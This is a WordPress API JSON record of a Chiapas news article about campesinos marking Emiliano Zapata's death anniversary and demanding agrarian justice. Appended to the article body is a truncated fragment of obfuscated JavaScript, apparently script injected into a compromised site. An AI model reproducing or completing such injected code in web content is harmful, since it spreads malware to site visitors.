{"id":21397,"date":"2025-04-11T02:55:04","date_gmt":"2025-04-11T02:55:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21397"},"modified":"2025-04-11T02:55:04","modified_gmt":"2025-04-11T02:55:04","slug":"campesinos-conmemoran-a-emiliano-zapata-y-exigen-justicia-agraria","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21397","title":{"rendered":"Campesinos conmemoran a Emiliano Zapata y exigen justicia agraria"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/6a154434-b9ab-4816-87fc-146e72870705-768x1024.jpg\" alt=\"\" class=\"wp-image-21398\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/6a154434-b9ab-4816-87fc-146e72870705-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/6a154434-b9ab-4816-87fc-146e72870705-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/6a154434-b9ab-4816-87fc-146e72870705-1152x1536.jpg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/6a154434-b9ab-4816-87fc-146e72870705.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>10 de abril del 2025. San Crist\u00f3bal de Las Casas.- Este 10 de abril, la Organizaci\u00f3n Campesina Emiliano Zapata Regi\u00f3n Carranza (OCEZ-RC), en coordinaci\u00f3n con la OCEZ Casa del Pueblo (CP), realiz\u00f3 una manifestaci\u00f3n en la cabecera municipal de Venustiano Carranza para conmemorar el 106 aniversario del asesinato del general Emiliano Zapata, l\u00edder revolucionario campesino. La organizaci\u00f3n record\u00f3 que el asesinato del caudillo del sur fue orquestado por el gobierno federal bajo \u00f3rdenes de Venustiano Carranza, con la intenci\u00f3n de frenar la lucha por la tierra y la justicia social.<\/p>\n\n\n\n<p>Durante el acto, los representantes de la organizaci\u00f3n denunciaron que, al igual que en tiempos de Zapata, persiste la explotaci\u00f3n de los campesinos y el acaparamiento de tierras por parte de caciques y terratenientes. Se\u00f1alaron que el asesinato del l\u00edder revolucionario simboliza la represi\u00f3n hist\u00f3rica contra quienes han exigido un reparto justo de la tierra y mejores condiciones de vida para los trabajadores del campo.<\/p>\n\n\n\n<p>La OCEZ-RC expres\u00f3 que desde 1995 mantiene la lucha por la regularizaci\u00f3n de tierras que tienen en posesi\u00f3n, entre ellas 145 hect\u00e1reas en Nuevo San Jos\u00e9, 200 en Candelaria El Alto y 150 en Santa Cruz. La organizaci\u00f3n se\u00f1al\u00f3 que han sostenido di\u00e1logo con distintos gobiernos a lo largo de los a\u00f1os, sin que hasta ahora se les haya dado una soluci\u00f3n efectiva a sus demandas, que tambi\u00e9n incluyen acceso a servicios b\u00e1sicos como salud, agua, vivienda y apoyo al campo.<\/p>\n\n\n\n<p>Los campesinos tambi\u00e9n reclamaron que las tierras en disputa han estado hist\u00f3ricamente en manos de unas cuantas familias con poder econ\u00f3mico, y que es necesario que se restituyan a quienes las han trabajado por generaciones. Exigieron que se reconozca el derecho de las comunidades campesinas a vivir y producir en sus territorios, sin amenazas ni despojos.<\/p>\n\n\n\n<p>Finalmente, la OCEZ-RC hizo un llamado urgente a los tres niveles de gobierno para atender sus demandas agrarias y sociales, castigar a los responsables de asesinatos de miembros de la organizaci\u00f3n, cancelar las \u00f3rdenes de aprehensi\u00f3n contra sus compa\u00f1eros, y detener la pol\u00edtica de despojo y explotaci\u00f3n de los recursos naturales a trav\u00e9s de megaproyectos que afectan a las comunidades rurales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal 10 de abril del 2025. San Crist\u00f3bal de Las Casas.- Este 10 de abril, la Organizaci\u00f3n Campesina Emiliano Zapata Regi\u00f3n Carranza (OCEZ-RC), en coordinaci\u00f3n con la OCEZ Casa del Pueblo (CP), realiz\u00f3 una manifestaci\u00f3n en la cabecera municipal de Venustiano Carranza para conmemorar el 106 aniversario del asesinato del general Emiliano Zapata, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21398,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21397","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21397","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21397"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21397\/revisions"}],"predecessor-version":[{"id":21399,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21397\/revisions\/21399"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21398"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21397"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21397"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21397"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}